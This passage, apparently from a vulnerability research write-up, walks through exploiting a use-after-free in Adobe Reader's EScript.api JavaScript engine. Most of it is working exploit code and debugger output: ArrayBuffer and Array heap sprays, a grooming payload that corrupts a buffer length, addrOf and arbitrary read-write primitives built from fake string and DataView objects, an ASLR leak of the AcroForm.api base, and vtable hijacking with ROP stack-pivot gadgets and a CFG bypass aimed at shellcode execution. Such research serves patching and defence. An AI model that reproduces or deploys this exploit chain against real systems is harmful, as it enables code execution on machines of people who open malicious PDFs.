    v4 = JS_malloc_Wrapper(*(_DWORD *)a2, v3);  // reallocate freed buffer again when string length is 0x48
    Block = (char *)v4;
    if ( v4 )
    {
      v25 = v3;
      v23 = (char *)v4;
      v21 = (char *)(a3 + 1);
      _mm_lfence();
      swab(v21, v23, v25);
      return JS_NewUCString(a1, *(_DWORD **)a2, Block, v3 / 2 - 1);
    }
    return 0;
  }
  ...
}

In the above code, JS_malloc_Wrapper will reallocate the freed CAgg buffer when processing a large number of strings, allowing us to reallocate the buffer with user-controlled data. When this sprayed buffer is later used in the CAgg::* functions, it causes a crash while dereferencing user-controlled data.

SpiderMonkey Internals in EScript.API

Firefox's SpiderMonkey is the JavaScript engine used inside Adobe Reader, through the EScript.api plugin, for processing JavaScript embedded in PDFs. To exploit this bug effectively, we need to understand how JavaScript objects are implemented in SpiderMonkey and how they are organized in memory.

SpiderMonkey uses a 64-bit representation to store a native JavaScript jsval in memory.

Doubles are stored as full 64-bit IEEE-754 values
Other jsvals such as integer numbers, strings, and objects use 32 bits for the type tag and 32 bits for the actual value (or object pointer)
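
The two storage forms can be illustrated with a small sketch in plain JavaScript. It assumes a little-endian layout with the value in the low word and the tag in the high word, as the Array dump later in this post shows. The helper names doubleToWords and wordsToDouble are ours.

```javascript
const scratch = new DataView(new ArrayBuffer(8));

// Split a double into the low and high 32-bit words as they would sit in memory.
function doubleToWords(x) {
  scratch.setFloat64(0, x, true);
  return { lo: scratch.getUint32(0, true), hi: scratch.getUint32(4, true) };
}

// Reinterpret two 32-bit words as a double.
function wordsToDouble(lo, hi) {
  scratch.setUint32(0, lo, true);
  scratch.setUint32(4, hi, true);
  return scratch.getFloat64(0, true);
}

const words = doubleToWords(1.5);
console.log(words.hi.toString(16), words.lo.toString(16));
// prints: 3ff80000 0

// A tagged pair such as (0x41424142, 0xffffff81) is a NaN when read as a double.
const taggedAsDouble = wordsToDouble(0x41424142, 0xffffff81);
console.log(Number.isNaN(taggedAsDouble));
// prints: true
```

Because a tagged word pair falls in the NaN range when read as a double, it cannot be confused with an ordinary double value, which is what lets both forms share the same 64-bit slot.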

ArrayBuffer

We will use ArrayBuffer for spraying user-controlled data at predictable addresses and corrupting the length with an arbitrarily large integer value to gain out-of-bounds read-write primitives. Let's look at how it is represented in memory.

The ArrayBuffer implementation consists of a 0x10-byte header followed by contents of the size specified.

4ef0cbf0  00000000 00000400 3cc31450 00000000  ........P..<.... +0x4: length, +0x8: TypedArray pointer
4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........ actual contents starts here
4ef0cc10  00000000 00000000 00000000 00000000  ................
4ef0cc20  00000000 00000000 00000000 00000000  ................
4ef0cc30  00000000 00000000 00000000 00000000  ................
4ef0cc40  00000000 00000000 00000000 00000000  ................
4ef0cc50  00000000 00000000 00000000 00000000  ................
4ef0cc60  00000000 00000000 00000000 00000000  ................

Length is stored at an offset of 0x4
If a TypedArray is initialized, its pointer is stored at an offset of 0x8
The actual user-controlled data follows at an offset of 0x10
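
As a minimal sketch, the header layout listed above can be applied to the first row of the dump. The function name parseArrayBufferHeader and the field names are ours, chosen for illustration.

```javascript
const HEADER_SIZE = 0x10;

// dwords: the first four 32-bit values of the allocation, as printed by `dc`.
function parseArrayBufferHeader(dwords) {
  return {
    length: dwords[1],                        // +0x4
    typedArrayPtr: dwords[2],                 // +0x8 (zero until a TypedArray is created)
    dataOffset: HEADER_SIZE,                  // contents start right after the header
    allocationSize: HEADER_SIZE + dwords[1],  // header plus contents
  };
}

const header = parseArrayBufferHeader([0x00000000, 0x00000400, 0x3cc31450, 0x00000000]);

console.log(
  header.length.toString(16),
  header.typedArrayPtr.toString(16),
  header.allocationSize.toString(16)
);
// prints: 400 3cc31450 410
```

The computed allocation size of 0x410 agrees with the UserSize that !heap reports for this buffer in the Locating ArrayBuffer section.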

In EScript.api, the sub_10131A2C function is responsible for allocating an ArrayBuffer of the specified length. If the size of the ArrayBuffer is at most 0x68 bytes, an inline representation is used to store the data. Otherwise, a block of memory of the specified size is allocated and filled with zeros.

char __thiscall sub_10131A2C(void **this, int a2, size_t Size, void *Src)
{
  _DWORD *v5; // eax
  void *v7; // eax
  unsigned __int8 v10; // [esp-4h] [ebp-10h]

  if ( Size <= 0x68 )  // small sizes appear to use an inline buffer | does not use the heap
                       // !heap -p -a @buffer failed to show any trace
  {
    this[3] = this + 10;  // address to our ArrayBuffer->buffer | this+0x28
    _mm_lfence();
    if ( Src )
      memcpy(this[3], Src, Size);
    else
      memset(this[3], 0, Size);
    v7 = this[3];
  }
  else
  {
    v10 = 0;
    _mm_lfence();
    v5 = sub_1013153C((wchar_t *)a2, Size, Src, (_DWORD *)v10);
    if ( !v5 )
      return 0;
    v7 = v5 + 4;
    this[3] = v7;
  }
  *((_DWORD *)v7 - 4) = 0;
  *((_DWORD *)v7 - 3) = Size;  // length of the ArrayBuffer
  *((_DWORD *)v7 - 1) = 0;
  *((_DWORD *)v7 - 2) = 0;     // typed array pointer (header +0x8) initialized to nullptr
  return 1;
}

Array

var a = new Array();
a[0] = 0x41424142;
a[1] = 0x55555555;
a[2] = "javascript";
a[3] = {};

We will use an Array to achieve the addrOf (address of) primitive. The representation of the JavaScript array above in memory is shown below.

0d9a2678  00000000 00000004 00000006 00000004  ................ 0x0: flag, 0x4: initLength, 0x8: capacity, 0xc: length
0d9a2688  41424142 ffffff81 55555555 ffffff81  BABA....UUUU.... (value, tag) for each value
0d9a2698  0d735fe0 ffffff85 0d9bf200 ffffff87  ._s.............
0d9a26a8  00000000 00000000 00000000 00000000  ................
0d9a26b8  00000000 00000000 00000000 00000000  ................
0d9a26c8  00000000 00000000 00000000 00000000  ................
0d9a26d8  00000000 00000000 00000000 00000000  ................
0d9a26e8  00000000 00000000 00000000 00000000  ................

sub_1004DBA9 in EScript.api is responsible for creating arrays and can be tracked while spraying arrays.

The contents of the array are organized as (value, tag) pairs in memory, where the tag identifies the type associated with the value.

e.g.

Number - ffffff81
String - ffffff85
Object - ffffff87
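
Using only the three tags listed above, the element slots from the Array dump can be decoded with a short sketch. The names TAG_NAMES and decodeSlots are ours, and any tag outside this list is simply reported as "other" rather than guessed.

```javascript
// Tags taken from the list above; anything else is reported as "other".
const TAG_NAMES = new Map([
  [0xffffff81, "number"],
  [0xffffff85, "string"],
  [0xffffff87, "object"],
]);

// dwords: consecutive 32-bit values from the dump, value first and tag second.
function decodeSlots(dwords) {
  const slots = [];
  for (let i = 0; i + 1 < dwords.length; i += 2) {
    const value = dwords[i] >>> 0;
    const tag = dwords[i + 1] >>> 0;
    slots.push({ type: TAG_NAMES.get(tag) || "other", value: value });
  }
  return slots;
}

// The two rows of element data from the Array dump.
const slots = decodeSlots([
  0x41424142, 0xffffff81, 0x55555555, 0xffffff81,
  0x0d735fe0, 0xffffff85, 0x0d9bf200, 0xffffff87,
]);

for (const s of slots) console.log(s.type, "0x" + s.value.toString(16));
```

For a[2] and a[3] the decoded value is the address of the string and of the object, which is why reading these slots gives the address of a JavaScript object.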

When we have out-of-bounds access on the ArrayBuffer, we can spray a large JavaScript array just after the ArrayBuffer and use the out-of-bounds primitive to read the address of any arbitrary JavaScript object.

We can see how our string is represented in memory by dumping the memory at the string pointer (0d735fe0) stored in the array above.

0:016> dc 0d735fe0
0d735fe0  000000a8 0d735fe8 0061006a 00610076  ....._s.j.a.v.a. 0x0: length, 0x4: ptr to content, 0x8: inlined contents
0d735ff0  00630073 00690072 00740070 00000000  s.c.r.i.p.t.....
0d736000  0bf80fb0 0d734000 0fff1000 00000013  .....@s.........
0d736010  00000228 0c1451f8 00000000 00000000  (....Q..........
0d736020  000000d8 0c0b8638 00000000 00000000  ....8...........
0d736030  000000d8 0c0b8660 00000000 00000000  ....`...........
0d736040  000001e8 0c149bb0 00000000 00000000  ................
0d736050  000000f8 0c0b8890 00000000 00000000  ................
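
The first two rows of this dump can be decoded by hand, as the sketch below shows. One point is an assumption on our part: the first dword is treated as a length shifted left by four bits with flag bits below it, which is consistent with 0xa8 >>> 4 being 10, the length of "javascript". The variable names are ours.

```javascript
// dwords copied from the first two rows of the `dc 0d735fe0` output above.
const base = 0x0d735fe0;
const dump = [
  0x000000a8, 0x0d735fe8, 0x0061006a, 0x00610076,
  0x00630073, 0x00690072, 0x00740070, 0x00000000,
];

// Assumption: the low 4 bits of the first dword are flags, the rest is the length.
const strLength = dump[0] >>> 4;
const contentPtr = dump[1];
const isInline = contentPtr === base + 8;  // pointer targets the bytes right after the header

// Each dword holds two UTF-16 code units, low half first (little-endian).
let text = "";
for (let i = 2; text.length < strLength; i++) {
  text += String.fromCharCode(dump[i] & 0xffff);
  if (text.length < strLength) text += String.fromCharCode(dump[i] >>> 16);
}

console.log(strLength, isInline, text);
// prints: 10 true javascript
```

The content pointer at +0x4 points at +0x8 of the same object, which matches the "inlined contents" annotation in the dump.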

Later, during exploitation, we will create fake strings with the help of an ArrayBuffer and use one of the sprayed fake strings to read arbitrary memory contents, achieving a temporary arbitrary read primitive.

Exploitation

We used .dvalloc to check whether we had any controlled read-write crashes or a crash while calling an arbitrary virtual function pointer.

We found a crash that leads to an arbitrary write on our controlled address:

(*ecx) = some_32_value where ecx is user-controlled pointer.

Strategy

Spray a lot of ArrayBuffer to get allocation at a predictable address like 0x20000048
Groom LFH with our specified pattern to corrupt the ArrayBuffer at a predictable address
Trigger the vulnerability to use the freed buffer and corrupt the ArrayBuffer length
Use corrupted ArrayBuffer to create a fake string to achieve arbitrary read primitive
Use arbitrary read from fake string to create fake DataView to achieve arbitrary read-write primitives
Corrupt field's virtual table to hijack execution control
Bypass CFG
Execute shellcode
Restore corrupted objects and recover cleanly

Spraying ArrayBuffer

var SPRAY = [];

for(var i=0; i<0x2000; i++) {
  SPRAY[i] = new ArrayBuffer(0x10000-24);
  const typedArray = new Uint32Array(SPRAY[i]);
  typedArray[0] = 0x41424344;
  typedArray[1] = 0x41424344;
}

Using the above script we can have an ArrayBuffer allocated at a predictable address such as 0x20000058.
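
The post does not explain the choice of 0x10000-24, so the following arithmetic is only one plausible reading. It assumes the 0x10-byte ArrayBuffer header described earlier plus 8 bytes of per-chunk heap metadata, which would make every allocation occupy exactly 0x10000 bytes. The constant names are ours.

```javascript
const COUNT = 0x2000;              // number of ArrayBuffers sprayed
const REQUESTED = 0x10000 - 24;    // size passed to new ArrayBuffer()
const AB_HEADER = 0x10;            // ArrayBuffer header described earlier
const HEAP_HEADER = 8;             // assumption: per-chunk heap metadata on 32-bit Windows

const perChunk = REQUESTED + AB_HEADER + HEAP_HEADER;
const total = COUNT * perChunk;

console.log(perChunk.toString(16), total.toString(16), total / (1024 * 1024));
// prints: 10000 20000000 512
```

Under these assumptions the spray covers 0x20000000 bytes (512 MiB) in 64 KiB steps, which would be consistent with landing a buffer at a predictable address just above 0x20000000.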

Locating ArrayBuffer

By using magic markers, we can locate the buffer in heap memory which helps to find the constructor which allocates the ArrayBuffer in Adobe Reader.

Note: Allocation of ArrayBuffer happens in EScript.api code.

For example, when allocating an ArrayBuffer of size 0x1020, searching memory for the magic marker and identifying who allocated the memory can help us find the ArrayBuffer constructor.

0:015> s -d 0 L?0xffffffff 0x41424344
0x4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........

0:015> !ext.heap -p -a 0x4ef0cc00
    address 4ef0cc00 found in
    _DPH_HEAP_ROOT @ 9521000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4eed11a0:         4ef0cbf0              410 -         4ef0c000             2000
    6ddea8b0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    7714ef0e ntdll!RtlDebugAllocateHeap+0x00000039
    770b6150 ntdll!RtlpAllocateHeap+0x000000f0
    770b57fe ntdll!RtlpAllocateHeapInternal+0x000003ee
    770b53fe ntdll!RtlAllocateHeap+0x0000003e
    767919c7 ucrtbase!_calloc_base+0x00000037
    69481bd5 EScript!sub_10011BAE+0x00000027
    695a15ce EScript!sub_1013153C+0x00000092
    695a1a4e EScript!sub_10131A2C+0x00000022
    695a4bce EScript!sub_10134B68+0x00000066
    695a1d75 EScript!sub_10131D10+0x00000065
    694a95b0 EScript!sub_100394E9+0x000000c7
    694a3505 EScript!js_Interpret+0x00001056
    694a246b EScript!sub_10032412+0x00000059
    694a237b EScript!sub_10032315+0x00000066
    694a22b0 EScript!js_Execute+0x0000007d
    6948b6b0 EScript!JS_EvaluateUCScriptForPrincipals+0x0000008b
    694ca9c6 EScript!JS_EvaluateUCScript+0x0000004d
    694ca6cb EScript!ESExecScript+0x0000010b

Verifying the ArrayBuffer backing memory (array buffer chunk + header size (0x10)).

0:015> ? 410
Evaluate expression: 1040 = 00000410
0:015> ? 4ef0cc00 - 4ef0cbf0
Evaluate expression: 16 = 00000010
0:015> dc 4ef0cbf0
4ef0cbf0  00000000 00000400 3cc31450 00000000  ........P..<....  +0x4: length, +0x8: typed array ptr
4ef0cc00  41424344 45464748 00000000 00000000  DCBAHGFE........ contents start here
4ef0cc10  00000000 00000000 00000000 00000000  ................
4ef0cc20  00000000 00000000 00000000 00000000  ................
4ef0cc30  00000000 00000000 00000000 00000000  ................
4ef0cc40  00000000 00000000 00000000 00000000  ................
4ef0cc50  00000000 00000000 00000000 00000000  ................
4ef0cc60  00000000 00000000 00000000 00000000  ................
0:015> ? 0x400
Evaluate expression: 1024 = 00000400

By using a WinDbg breakpoint on the constructor code, we can find the addresses where ArrayBuffer is being allocated.

bp Escript+0x131a4e ".printf \"[ArrayBuffer alloc] %p \\n\", eax; gc"

Now, let's see what the actual ArrayBuffer spray looks like in the exploit.

function sprayArrBuffers()
{
  for (var i=0; i<0x1500; i++)
  {
    bufs[i] = new ArrayBuffer(ALLOC_SIZE);
    const uintArr = new Uint32Array(bufs[i]);
    for (var k =0; k<16; k++) 
    {
      uintArr[k] = 0x33333333;
    }
    uintArr[0] = arrBufPtr + 8; //first deref a = *ecx
    uintArr[1] = 0x41424344; //map size
    uintArr[2] = 0x41424344;
    uintArr[3] = ARR_BUF_BASE - 4;

    // fake string for arbitrary read
    uintArr[FAKE_STR_START] = 0x102; //type
    uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer
    uintArr[FAKE_STR_START+2] = 0x4;
    uintArr[FAKE_STR_START+3]= 0x4;

    // fake dataview for arbitrary write
    uintArr[FAKE_DV_START] = 0x77777777;
    delete uintArr;
    uintArr = null;
  }

  for (var i=0; i<0x10; i++)
  {
    arrs[i] = new Array(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1,2, 3, 4, 5, 6, 7, 8, 9, 10, 11,12,13, 14, 15, 17,18, 19, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25, 20, 21, 22, 23, 24, 25,20,21,22,23);
    arrs[i][0] = 0x47484950;
    arrs[i][1] = targetStr;
    arrs[i][2] = targetDV;
    for (var k=3; k<5000; k++)
    {
      arrs[i][k] = 0x50515051;
    }
  }
}

The ArrayBuffer allocation at the predictable address 0x20000048 succeeded:

0:011> dc 0x20000048
20000048  00000000 0000ffe8 135c4348 00000000  ........HC\..... +0x4: length, +0x8: typed array
20000058  20000060 00000000 00000000 20000044  `.. ........D.. 
20000068  33333333 33333333 33333333 33333333  3333333333333333
20000078  33333333 33333333 33333333 33333333  3333333333333333
20000088  33333333 33333333 33333333 33333333  3333333333333333
20000098  00000000 00000000 00000000 00000000  ................
200000a8  00000000 00000000 00000000 00000000  ................
200000b8  00000000 00000000 00000000 00000000  ................

By using heap grooming with our predictable address pattern and triggering the vulnerability, we can see that the ArrayBuffer length is corrupted/modified.

// encoding %u0058%u2000 (0x20000058) at the offset required by the vulnerability
const code =
  "%u4141%u4242%u4343%u4444%u4545%u4646%u4747%u4848%u4949%u4a4a%u4b4b%u4c4c%u4d4d%u4e4e%u4f4f%u5050%u0058%u2000%u5353%u5454%u5555%u5656%u5757%u5858%u5959%u5a5a%u5b5b%u5c5c%u5d5d%u5e5e%u5f5f%u6060%u6161%u6262%u6363%u6464%u6565%u6666%u6767%u6868%u6969%u6a6a%u6b6b%u6c6c%u6d6d%u6e6e%u6f6f%u7070%u7171%u7272%u7373%u7474%u7575%u7676%u7777%u7878%u7979%u7a7a%u7b7b%u7c7c%u7d7d%u7e7e%u7f7f%u8080%u8181%u8282%u8383%u8484";

0:023> dc 20000048
20000048  00000000 247c3308 243722f0 00000000  .....3|$."7$.... +0x4: length, +0x8: typed array
20000058  20000060 00000000 00000000 20000044  `.. ........D.. 
20000068  33333333 33333333 33333333 33333333  3333333333333333
20000078  33333333 33333333 33333333 33333333  3333333333333333
20000088  33333333 33333333 33333333 33333333  3333333333333333
20000098  00000000 00000000 00000000 00000000  ................
200000a8  00000000 00000000 00000000 00000000  ................
200000b8  00000000 00000000 00000000 00000000  ................

The length of the ArrayBuffer is corrupted by a pointer value, allowing for relative out-of-bounds read-write on the heap.
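The grooming pattern stores the address as two %uXXXX escapes with the low 16 bits first, so that the resulting UTF-16 string holds the value in little-endian order. A minimal sketch of that encoding follows; hex16, encodeDword and decodeDword are hypothetical helper names, not part of the exploit.

```javascript
// Format a 16-bit value as four lowercase hex digits.
function hex16(n) {
  return ("0000" + n.toString(16)).slice(-4);
}

// Encode a 32-bit value as two %uXXXX escapes, low half first.
function encodeDword(value) {
  var lo = value & 0xffff;
  var hi = (value >>> 16) & 0xffff;
  return "%u" + hex16(lo) + "%u" + hex16(hi);
}

// Decode the escapes back into the 32-bit value they represent in memory.
function decodeDword(escaped) {
  var s = unescape(escaped);
  return ((s.charCodeAt(1) << 16) | s.charCodeAt(0)) >>> 0;
}

console.log(encodeDword(0x20000058));
console.log("0x" + decodeDword("%u0058%u2000").toString(16));
```

The round trip shows why the pattern contains %u0058%u2000 rather than %u2000%u0058.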

Once the vulnerability is triggered, the corrupted ArrayBuffer can be located using the code below.

for (var i=0; i<bufs.length; i++)
{
  if (bufs[i].byteLength != ALLOC_SIZE)
  {
    console.println("[+] corrupted array buffer found at " + i + " : length: " + bufs[i].byteLength + " : buf length: " + bufs.length);
    ...
  }
}

Out-of-bounds to Arbitrary Read-Write Primitives

Once out-of-bounds read-write is achieved on the ArrayBuffer, a second spray of JavaScript Arrays is used to build the addrOf primitive. To be able to read and write these Arrays, we spray a set of Arrays whose allocation size is similar to that of the ArrayBuffers, so that they land just after the ArrayBuffer spray, as shown below.

-------------------------------------------------------------------------------
|        |        |        |         |        |   |       |       |   |       |
|arrbuf_1|arrbuf_2|arrbuf_3|.........|arrbuf_n|...|array_1|array_2|...|array_n|
|        |        |        |         |        |   |       |       |   |       |
-------------------------------------------------------------------------------

With ArrayBuffer out-of-bounds access, we can find the start of the first Array and use it to further create another set of primitives.

addrOf

leak address of any JavaScript object

poi

leak value at a given address (this initial form of AAR is required to create full AAR/AAW)

AAR

read the arbitrary value at a given address

AAW

write value at a given address

Spraying large Array

We need to allocate a few large Arrays just after our sprayed ArrayBuffers
Once we corrupt the length of the ArrayBuffer, we can locate these Arrays and corrupt the adjacent Array to build arbitrary read-write primitives
However, the JavaScript Array reallocations grow in a fixed pattern when we add a large number of elements to the Array in a loop

for(var k = 0; k<N; k++) {
  _arr_.push(0x41414141);
}

After some testing, we observed that the reallocation length can be partially controlled by allocating Array with initial contents

// the initial contents were adjusted over a few test iterations
// so that the Array ends up allocated just after the sprayed ArrayBuffers
var _arr_ = new Array(1, 2, 3, 4);

Controlled Array Spraying

An Array created with an initializer list should start with an allocation of 0x003f0 bytes
Initializing further elements inside the for loop should then grow the allocation through reallocs
The allocation size grows as: 0x003f0 -> 0x007d0 -> 0x00f90 -> 0x01f10 -> 0x03e10 -> 0x07c10 -> 0x0f810
Reallocations of size 0x0f810 should land the Array allocations just after the last ArrayBuffer from our spray
When we read out of bounds from the corrupted ArrayBuffer, we should be able to read the contents of the sprayed Array

for (var i = 0; i < 0x10; i++) {
  arrayRefs[i] = new Array(
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
    21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
    61, 62
  );
  arrayRefs[i][0] = 0x47484950;
  arrayRefs[i][1] = targetStr;       // string object, we use for arbitrary read
  arrayRefs[i][2] = targetDataView;  // DataView we use for crafting AAR/AAW

  for (var k = 3; k < 5000; k++) {
    arrayRefs[i][k] = 0x50515051;
  }
}
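The growth sequence listed above is consistent with a 0x10-byte header followed by a payload that doubles on every reallocation. The sketch below checks that reading against the observed sizes; the doubling model and the helper name growthSizes are our interpretation of the numbers, not something taken from the EScript code.

```javascript
var HEADER_SIZE = 0x10; // header seen in front of element 0 in the Array dump

// Predict `count` allocation sizes, assuming the payload doubles on each realloc.
function growthSizes(firstSize, count) {
  var sizes = [];
  var payload = firstSize - HEADER_SIZE;
  for (var i = 0; i < count; i++) {
    sizes.push(payload + HEADER_SIZE);
    payload *= 2;
  }
  return sizes;
}

var observed = [0x3f0, 0x7d0, 0xf90, 0x1f10, 0x3e10, 0x7c10, 0xf810];
var predicted = growthSizes(observed[0], observed.length);

console.log(predicted.map(function (n) {
  return "0x" + n.toString(16);
}).join(" -> "));
```

Under this model, tuning the initializer list changes only the first size, and the later sizes follow from it.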

The final Array allocation should look as given below.

EScript!sub_1004DBA9+0xa4:
6a41dc4d 8bf8            mov     edi,eax
0:000> g
24188270  00000000 00000f80 00000f80 00000f80  ................
24188280  47484950 ffffff81 0db3c420 ffffff85  PIHG.... .......
24188290  0dda27c0 ffffff87 50515051 ffffff81  .'......QPQP.... 
241882a0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882b0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882c0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882d0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....
241882e0  50515051 ffffff81 50515051 ffffff81  QPQP....QPQP....

0:015> !ext.heap -p -a 24188270
    address 24188270 found in
    _HEAP @ 4f10000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        24188268 1f03 0000  [00]   24188270    0f810 - (busy)

Where 0db3c420 ffffff85 is targetStr and 0dda27c0 ffffff87 is targetDataView.
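The dump shows each Array element as a pair of dwords, a payload followed by a type tag, placed after a 0x10-byte header. The sketch below decodes the first three elements from the dump to make that layout explicit. The tag names are inferred only from what the dump pairs them with (an integer, targetStr, targetDataView), and the helper names are hypothetical.

```javascript
var HEADER_DWORDS = 4;   // 0x10-byte header in front of element 0
var DWORDS_PER_SLOT = 2; // payload dword followed by a tag dword

// Tag meanings inferred from the dump above, not from documentation.
var TAG_NAMES = {};
TAG_NAMES[0xffffff81] = "int32";
TAG_NAMES[0xffffff85] = "string";
TAG_NAMES[0xffffff87] = "object";

// Dword index (relative to the Array start) of an element's payload.
function payloadIndex(elementIndex) {
  return HEADER_DWORDS + DWORDS_PER_SLOT * elementIndex;
}

function readSlot(dwords, elementIndex) {
  var i = payloadIndex(elementIndex);
  var tag = dwords[i + 1];
  return { payload: dwords[i], tag: tag, type: TAG_NAMES[tag] || "unknown" };
}

// First 0x30 bytes of the Array dump at 24188270.
var dump = [
  0x00000000, 0x00000f80, 0x00000f80, 0x00000f80,
  0x47484950, 0xffffff81, 0x0db3c420, 0xffffff85,
  0x0dda27c0, 0xffffff87, 0x50515051, 0xffffff81
];

for (var e = 0; e < 4; e++) {
  var slot = readSlot(dump, e);
  console.log(e + ": 0x" + slot.payload.toString(16) + " (" + slot.type + ")");
}
```

This is why the primitives that follow index the corrupted typed array at arrStart+4, arrStart+6 and arrStart+8: those are the payload dwords of elements 0, 1 and 2.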

addrOf Primitive

The addrOf primitive allows us to leak the address of any JavaScript object by reading the address of the object stored in a sprayed Array using out-of-bounds primitives. The corruptedTypedArr is a typed array with a corrupted ArrayBuffer length, and arrStart is the index where the JavaScript Array is located from the start of the corrupted ArrayBuffer. The modified_arr is the JavaScript Array from the sprayed Arrays that we will use for corruption and address leakage.

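function addrOf(obj)
{
  // store the object in element 0 of the sprayed Array
  modified_arr[0] = obj;
  // read its pointer back through the out-of-bounds typed array
  var addr = corruptedTypedArr[arrStart+4];
  return addr;
}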

Temporary Arbitrary Read Primitive

The poi primitive allows us to read the value at an arbitrary address.

To achieve poi primitive, we need to perform a few steps:

Allocate a string in global scope like var targetStr = "Hello";
Spray the above string object as an element in sprayed arrays arrs[i][1] = targetStr;
Spray fake string structure inside sprayed ArrayBuffer

uintArr[FAKE_STR_START] = 0x102; // type
uintArr[FAKE_STR_START+1] = arrBufPtr+0x40; // buffer

Once out-of-bounds primitives are achieved, we overwrite the pointer to the sprayed string object stored in the Array with the address of the fake string: uintArr[arrStart+6] = FAKE_STR;.
Now, targetStr, which was sprayed along with the Array, is confused with the fake string.
To read the value at an arbitrary address, we set the backing buffer pointer of the fake string to addr and then read the targetStr element of our modified Array as usual.

function s2h(s) {
  // combine two UTF-16 code units into one little-endian 32-bit value
  var n1 = s.charCodeAt(0);
  var n2 = s.charCodeAt(1);
  return ((n2<<16) | n1) >>> 0;
}

function poi(addr)
{
  // leak values at addr by setting it to string pointer
  corruptedTypedArr[FAKE_STR_START+1] = addr;
  var val = s2h(modified_arr[1]);
  return val;
}
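The s2h helper treats the first two UTF-16 code units of a string as the low and high halves of a 32-bit value. The standalone sketch below repeats the helper and runs it on ordinary strings to show the byte order; the sample values are ours.

```javascript
// Same logic as s2h above: two UTF-16 code units -> one unsigned 32-bit value.
function s2h(s) {
  var n1 = s.charCodeAt(0); // low 16 bits
  var n2 = s.charCodeAt(1); // high 16 bits
  return ((n2 << 16) | n1) >>> 0;
}

// 0x41424344 stored little-endian is the code units 0x4344, 0x4142.
var sample = String.fromCharCode(0x4344, 0x4142);
console.log("0x" + s2h(sample).toString(16));

// The trailing >>> 0 keeps values with the top bit set unsigned.
var high = String.fromCharCode(0x0000, 0xffff);
console.log("0x" + s2h(high).toString(16));
```

Without the final unsigned shift, the second value would come back as a negative number, which would break later pointer arithmetic.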

Arbitrary Read-Write Primitives

Once we achieve out-of-bounds read-write on the ArrayBuffer, we can use the addrOf and poi primitives to perform arbitrary reads. With these primitives, we can derive full arbitrary read-write primitives by using the JavaScript DataView object.

To create arbitrary read-write primitives using a DataView object, we can follow these steps:

Create a DataView object with a valid ArrayBuffer and set an initial value for it:

var targetDV  = new DataView(new ArrayBuffer(0x64));
targetDV.setUint32(0, 0x55555555, true);

Spray the targetDV object as an element in an Array of sprayed Arrays:

for (var i=0; i<0x10; i++)
{
  ...
  arrs[i][2] = targetDV;
  ...
}

Create a fake DataView object by spraying an ArrayBuffer and setting a magic number value at the start of the spray.

uintArr[FAKE_DV_START] = 0x77777777;

Once out-of-bounds primitives are achieved, assign the fake DataView object to the address of the sprayed DataView object.

uintArr[arrStart + 8] = FAKE_DV;

Clone the contents of the valid DataView object into the fake DataView using the previously constructed primitives.

var targetDVPtr = addrOf(targetDV);

for (var k=0; k<32; k++)
{
  corruptedTypedArr[FAKE_DV_START + k] = poi(targetDVPtr + (k * 4));
}

Finally, to perform arbitrary read-write, set up the fake DataView object's backing ArrayBuffer pointer and read/write from the DataView object.

function AAR(addr)
{
  corruptedTypedArr[FAKE_DV_START + 20] = addr;
  return modified_arr[2].getUint32(0, true);
}

function AAW(addr, value)
{
  corruptedTypedArr[FAKE_DV_START + 20] = addr;
  modified_arr[2].setUint32(0, value, true);
}
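Both AAR and AAW pass true as the littleEndian argument of getUint32 and setUint32. The sketch below uses an ordinary DataView over an ordinary ArrayBuffer, with hypothetical helper names readDword and writeDword, to show what that flag does to the byte order.

```javascript
// Little-endian 32-bit accessors on a normal DataView.
function readDword(view, offset) {
  return view.getUint32(offset, true);
}

function writeDword(view, offset, value) {
  view.setUint32(offset, value >>> 0, true);
}

var view = new DataView(new ArrayBuffer(0x64));
writeDword(view, 0, 0x11223344);

// The bytes are stored least significant first.
var bytes = [view.getUint8(0), view.getUint8(1), view.getUint8(2), view.getUint8(3)];
console.log(bytes.map(function (b) { return b.toString(16); }).join(" "));

// Reading the same bytes as big-endian gives a different value.
console.log("little-endian: 0x" + readDword(view, 0).toString(16));
console.log("big-endian:    0x" + view.getUint32(0, false).toString(16));
```

Since x86 stores pointers little-endian, the flag has to be true for values read or written this way to match what the debugger shows.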

Shellcode Execution

To execute shellcode, we use the arbitrary read-write (AAR/AAW) primitives to bypass ASLR and CFG.

The steps are as follows:

Bypass ASLR by leaking the AcroForm.api base address from the field object

var AcroFormApiBase = AAR(AAR(addrOf(testField) + 0x10) + 0x34) - 0x00293fe0

Leak the address of the field vtable

var fieldVtblAddr = AAR(AAR(AAR(AAR(addrOf(testField) + 0x10) + 0x10) + 0xc) + 4)
var fieldVtbl = AAR(fieldVtblAddr)

Clone the vtable into the heap (cloning is necessary as we do not have the write permission on the vtable address). We clone it to our chosen heap address (picked from the ArrayBuffer spray) and make further modifications there.

for(var i=0; i < 32; i++) {
  AAW(arrBufPtr + 0x100 + (i * 4), AAR(fieldVtbl + i * 4));
}

Perform stack pivoting into our controlled heap for shellcode execution. We prepare a fake stack on the heap with the necessary details as shown below:

AAW(arrBufPtr+0x100+0x48, AcroFormApiBase+0x6faa60);  // CFG gadget = AcroForm!sub_20EFAA60;
AAW(arrBufPtr+0x100+0x30, AcroFormApiBase+0x256984);  // 0x6b5e6984: mov esp, eax; dec ecx; ret;
AAW(arrBufPtr+0x100, AcroFormApiBase+0x1e646);        // 0x6b3ae646: pop esp; ret;
AAW(arrBufPtr+0x100+4, arrBufPtr+0x300);              // our pivoted stack
AAW(fieldVtblAddr, arrBufPtr+0x100);                  // field vtable

